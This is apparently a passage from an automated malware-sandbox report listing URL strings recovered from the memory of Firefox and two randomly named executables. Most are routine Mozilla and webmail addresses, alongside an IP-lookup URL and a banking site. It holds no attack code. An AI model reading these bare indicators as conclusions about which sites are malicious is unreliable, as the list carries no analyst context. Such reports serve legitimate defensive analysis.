Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
Source: firefox.exe, 00000021.00000002.2957984264.000001729E7C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
Source: firefox.exe, 0000001C.00000002.3057721005.000001DEECA03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
Source: firefox.exe, 00000021.00000002.2957984264.000001729E7C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 0000001C.00000003.2757888538.000001DEF6A28000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2758502866.000001DEF6A31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2828014808.000001DEF6A28000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2825634807.000001DEF6A30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 0000001C.00000003.2757888538.000001DEF6A28000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2758502866.000001DEF6A31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2828014808.000001DEF6A28000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2825634807.000001DEF6A30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 0000001C.00000003.2720133791.000001DEEC120000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2719907749.000001DEEE700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720400561.000001DEEC141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720790655.000001DEEC163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshotsshims/private-browsing-web-api-fixes.jsaboutConfigPip
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 0000001C.00000002.2978589406.000001DEDEB11000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881.browser
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp, 98a7b9f337.exe, 00000022.00000002.2946404134.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/ip
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://httpbin.org/ipbefore
Source: firefox.exe, 0000001C.00000003.2933112137.000001DEF03A6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2792631818.000001DEFA713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2890160247.000001DEF9D91000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3049413497.000001DEEC2C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ib.absa.co.za/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 00000021.00000002.2966388065.000001729E803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 0000001C.00000002.3057721005.000001DEECA32000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 0000001C.00000003.2755657148.000001DEF0CC0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2967932562.000001D14F003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E78F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB97D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2997922183.000001DEEA4A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/metrics/1/3aaa7c43-9c88-40ac-93a5-c993
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submits
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 0000001C.00000003.2896162189.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF6998000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA3AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755694462.000001DEEF0A3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 0000001C.00000003.2755694462.000001DEEF0D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 0000001C.00000003.2910065957.000001DEF1F68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: firefox.exe, 0000001C.00000003.2910065957.000001DEF1F68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9DEB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2933112137.000001DEF03A6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2792631818.000001DEFA713000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3049413497.000001DEEC2C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2890160247.000001DEF9D77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://lookerstudio.google.com/embed/reporting/
Source: firefox.exe, 0000001C.00000002.3056833390.000001DEEC939000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2721477258.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2839862901.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%shttps://outlook.live.com/default.aspx?rru=compose&
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sisDefault
Source: firefox.exe, 0000001C.00000002.3056833390.000001DEEC939000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3003513879.000001DEEA97D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2721477258.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2839862901.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 0000001C.00000002.3056833390.000001DEEC939000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3003513879.000001DEEA97D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2721477258.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2839862901.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%sSEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLhttps://mail.yandex
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%shttps://poczta.interia.pl/mh/?mailto=%shttp://www.inbox.lv/rf
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: firefox.exe, 0000001F.00000002.2955222099.000001D14E8C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E78F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mochitest.youtube.com/
Source: firefox.exe, 0000001C.00000002.3057721005.000001DEECA42000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.comhttps://truecolors.firefox.comhttps://support.mozilla.orgbrowser.tabs.dra
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mzl.la/3NS9KJd
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ok.ru/
Source: firefox.exe, 0000001C.00000002.3056833390.000001DEEC939000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2721477258.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2839862901.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/page/
Source: firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/player/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2721477258.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2839862901.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com
